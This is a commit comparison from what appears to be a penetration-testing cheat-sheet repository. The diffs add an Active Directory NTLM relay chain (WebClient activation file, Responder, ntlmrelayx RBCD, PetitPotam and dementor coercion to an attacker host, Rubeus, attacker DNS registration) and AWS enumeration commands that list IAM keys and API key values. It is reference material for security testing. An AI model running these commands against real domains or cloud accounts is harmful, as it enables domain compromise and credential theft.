Compare commits
3 Commits
046743ac0c
...
ffcb09ddde
Author | SHA1 | Date |
---|---|---|
Nidhi Shinde | ffcb09ddde | |
Swissky | 04842b53a8 | |
Swissky | 26d5c2e432 |
|
@ -2,11 +2,12 @@
|
|||
|
||||
## Using BloodHound
|
||||
|
||||
Use the correct collector:
|
||||
Use the appropriate data collector to gather information for **BloodHound** or **BloodHound Community Edition (CE)** across various platforms.
|
||||
|
||||
* [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) for Azure Active Directory
|
||||
* [BloodHoundAD/SharpHound](https://github.com/BloodHoundAD/SharpHound) for local Active Directory (C# collector)
|
||||
* [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
|
||||
* [g0h4n/RustHound-CE](https://github.com/g0h4n/RustHound-CE) for local Active Directory (Rust collector)
|
||||
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
|
||||
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
|
||||
* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
|
||||
|
|
|
@ -245,18 +245,55 @@ secretsdump.py -k -no-pass target.lab.local
|
|||
|
||||
* WebClient service
|
||||
|
||||
|
||||
**Enable WebClient**:
|
||||
|
||||
WebClient service can be enable on the machine using several techniques:
|
||||
|
||||
* Mapping a WebDav server using `net` command : `net use ...`
|
||||
* Typing anything into the explorer address bar that isn't a local file or directory
|
||||
* Browsing to a directory or share that has a file with a `.searchConnector-ms` extension located inside.
|
||||
```xml
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
|
||||
<description>Microsoft Outlook</description>
|
||||
<isSearchOnlyItem>false</isSearchOnlyItem>
|
||||
<includeInStartMenuScope>true</includeInStartMenuScope>
|
||||
<templateInfo>
|
||||
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
|
||||
</templateInfo>
|
||||
<simpleLocation>
|
||||
<url>https://example/</url>
|
||||
</simpleLocation>
|
||||
</searchConnectorDescription>
|
||||
```
|
||||
|
||||
**Exploitation**:
|
||||
|
||||
* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
|
||||
* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
|
||||
* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
|
||||
* Discover WebDAV services
|
||||
* Discover machines on the network with enabled WebClient service
|
||||
```ps1
|
||||
webclientservicescanner 'domain.local'/'user':'password'@'machine'
|
||||
netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
|
||||
netexec smb 10.10.10.10 -d 'domain' -u 'user' -p 'password' -M webdav
|
||||
GetWebDAVStatus.exe 'machine'
|
||||
```
|
||||
* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.
|
||||
|
||||
* Disable HTTP in Responder
|
||||
```ps1
|
||||
sudo vi /usr/share/responder/Responder.conf
|
||||
```
|
||||
|
||||
* Generate a Windows machine name, e.g: "WIN-UBNW4FI3AP0"
|
||||
```ps1
|
||||
sudo responder -I eth0
|
||||
```
|
||||
|
||||
* Prepare for RBCD against the DC
|
||||
```ps1
|
||||
python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support
|
||||
```
|
||||
|
||||
|
||||
* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.10.10.10`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System.
|
||||
```ps1
|
||||
# PrinterBug
|
||||
dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
|
||||
|
@ -267,6 +304,7 @@ secretsdump.py -k -no-pass target.lab.local
|
|||
Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
|
||||
PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
|
||||
```
|
||||
|
||||
* Use the created account to ask for a service ticket:
|
||||
```ps1
|
||||
.\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W'
|
||||
|
@ -275,6 +313,13 @@ secretsdump.py -k -no-pass target.lab.local
|
|||
# IP of PC1: 10.0.0.4
|
||||
```
|
||||
|
||||
An alternative for the previous exploitation method is to register a **DNS entry** for the attack machine by yourself then trigger the coercion.
|
||||
|
||||
```ps1
|
||||
python3 /opt/krbrelayx/dnstool.py -u lab.lan\\jdoe -p 'P@ssw0rd' -r attacker.lab.lan -a add -d 192.168.1.50 192.168.1.2
|
||||
python3 /opt/PetitPotam.py -u jdoe -p 'P@ssw0rd' -d lab.lan attacker@80/test 192.168.1.3
|
||||
```
|
||||
|
||||
|
||||
## Man-in-the-middle RDP connections with pyrdp-mitm
|
||||
|
||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,74 @@
|
|||
# AWS - CLI
|
||||
|
||||
The AWS Command Line Interface (CLI) is a unified tool to manage AWS services from the command line. Using the AWS CLI, you can control multiple AWS services, automate tasks, and manage configurations through profiles.
|
||||
|
||||
|
||||
## Set up AWS CLI
|
||||
|
||||
Install AWS CLI and configure it for the first time:
|
||||
|
||||
```ps1
|
||||
aws configure
|
||||
```
|
||||
|
||||
This will prompt for:
|
||||
|
||||
* AWS Access Key ID
|
||||
* AWS Secret Access Key
|
||||
* Default region name
|
||||
* Default output format
|
||||
|
||||
|
||||
## Creating Profiles
|
||||
|
||||
You can configure multiple profiles in `~/.aws/credentials` and `~/.aws/config`.
|
||||
|
||||
* `~/.aws/credentials` (stores credentials)
|
||||
|
||||
```ini
|
||||
[default]
|
||||
aws_access_key_id = <default-access-key>
|
||||
aws_secret_access_key = <default-secret-key>
|
||||
|
||||
[dev-profile]
|
||||
aws_access_key_id = <dev-access-key>
|
||||
aws_secret_access_key = <dev-secret-key>
|
||||
|
||||
[prod-profile]
|
||||
aws_access_key_id = <prod-access-key>
|
||||
aws_secret_access_key = <prod-secret-key>
|
||||
```
|
||||
|
||||
* `~/.aws/config` (stores region and output settings)
|
||||
|
||||
```ini
|
||||
[default]
|
||||
region = us-east-1
|
||||
output = json
|
||||
|
||||
[profile dev-profile]
|
||||
region = us-west-2
|
||||
output = yaml
|
||||
|
||||
[profile prod-profile]
|
||||
region = eu-west-1
|
||||
output = json
|
||||
```
|
||||
|
||||
You can also create profiles via the command line:
|
||||
|
||||
```ps1
|
||||
aws configure --profile dev-profile
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Using Profiles
|
||||
|
||||
When running AWS CLI commands, you can specify which profile to use by adding the `--profile` flag:
|
||||
|
||||
```ps1
|
||||
aws s3 ls --profile dev-profile
|
||||
```
|
||||
|
||||
If no profile is specified, the **default** profile is used.
|
|
@ -3,6 +3,18 @@
|
|||
* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode
|
||||
|
||||
|
||||
## Listing Information About EC2
|
||||
|
||||
```ps1
|
||||
aws ec2 describe-instances
|
||||
aws ec2 describe-instances --region region
|
||||
aws ec2 describe-instances --instance-ids ID
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Copy EC2 using AMI Image
|
||||
|
||||
First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1`
|
||||
|
|
|
@ -1,6 +1,19 @@
|
|||
# AWS - Identity & Access Management
|
||||
|
||||
## AWS - Shadow Admin
|
||||
## Listing IAM access Keys
|
||||
|
||||
```ps1
|
||||
aws iam list-access-keys
|
||||
```
|
||||
|
||||
### Listing IAM Users and Groups
|
||||
|
||||
```ps1
|
||||
aws iam list-users
|
||||
aws iam list-groups
|
||||
```
|
||||
|
||||
## Shadow Admin
|
||||
|
||||
### Admin equivalent permission
|
||||
|
||||
|
@ -104,7 +117,6 @@
|
|||
```
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/)
|
|
@ -1,7 +1,21 @@
|
|||
# AWS - Service - Lambda
|
||||
# AWS - Service - Lambda & API Gateway
|
||||
|
||||
|
||||
## Extract function's code
|
||||
## List Lambda Functions
|
||||
|
||||
```ps1
|
||||
aws lambda list-functions
|
||||
```
|
||||
|
||||
|
||||
### Invoke a Lambda Function
|
||||
|
||||
```
|
||||
aws lambda invoke --function-name name response.json --region region
|
||||
```
|
||||
|
||||
|
||||
## Extract Function's Code
|
||||
|
||||
```powershell
|
||||
aws lambda list-functions --profile uploadcreds
|
||||
|
@ -10,6 +24,37 @@ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
|
|||
```
|
||||
|
||||
|
||||
## List API Gateway
|
||||
|
||||
```ps1
|
||||
aws apigateway get-rest-apis
|
||||
aws apigateway get-rest-api --rest-api-id ID
|
||||
```
|
||||
|
||||
|
||||
## Listing Information About Endpoints
|
||||
|
||||
```ps1
|
||||
aws apigateway get-resources --rest-api-id ID
|
||||
aws apigateway get-resource --rest-api-id ID --resource-id ID
|
||||
aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
|
||||
```
|
||||
|
||||
|
||||
## Listing API Keys
|
||||
|
||||
```ps1
|
||||
aws apigateway get-api-keys --include-values
|
||||
```
|
||||
|
||||
|
||||
## Getting Information About A Specific Api Key
|
||||
|
||||
```ps1
|
||||
aws apigateway get-api-key --api-key KEY
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Getting shell and data access in AWS by chaining vulnerabilities - Appsecco - Riyaz Walikar - Aug 29, 2019](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
|
|
@ -5,7 +5,7 @@
|
|||
:warning: Only working with IMDSv1.
|
||||
Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
|
||||
|
||||
In order to use IMDSv2 you must provide a token.
|
||||
In order to use **IMDSv2** you must provide a token.
|
||||
|
||||
```powershell
|
||||
export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
|
||||
|
|
|
@ -58,12 +58,13 @@ export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
|
|||
```
|
||||
|
||||
|
||||
## Open S3 Bucket
|
||||
## Public S3 Bucket
|
||||
|
||||
An open S3 bucket refers to an Amazon Simple Storage Service (Amazon S3) bucket that has been configured to allow public access, either intentionally or by mistake. This means that anyone on the internet could potentially access, read, or even modify the data stored in the bucket, depending on the permissions set.
|
||||
|
||||
* [http://s3.amazonaws.com/<bucket-name>/](http://s3.amazonaws.com/<bucket-name>/)
|
||||
* [http://<bucket-name>.s3.amazonaws.com/](http://<bucket-name>.s3.amazonaws.com/)
|
||||
* [https://<bucket-name>.region.amazonaws.com/<file>>](https://<bucket-name>.region.amazonaws.com/<file>)
|
||||
|
||||
AWS S3 buckets name examples: [http://flaws.cloud.s3.amazonaws.com](http://flaws.cloud.s3.amazonaws.com).
|
||||
|
||||
|
@ -107,21 +108,21 @@ aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
|
|||
|
||||
### Copy, Upload and Download Files
|
||||
|
||||
* Copy
|
||||
* **Copy**
|
||||
```bash
|
||||
aws s3 cp <source> <target> [--options]
|
||||
aws s3 cp local.txt s3://bucket-name/remote.txt --acl authenticated-read
|
||||
aws s3 cp login.html s3://bucket-name --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
|
||||
```
|
||||
|
||||
* Upload
|
||||
* **Upload**
|
||||
```bash
|
||||
aws s3 mv <source> <target> [--options]
|
||||
aws s3 mv test.txt s3://hackerone.files
|
||||
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
|
||||
```
|
||||
|
||||
* Download
|
||||
* **Download**
|
||||
```bash
|
||||
aws s3 sync <source> <target> [--options]
|
||||
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
|
||||
|
|
Loading…
Reference in New Issue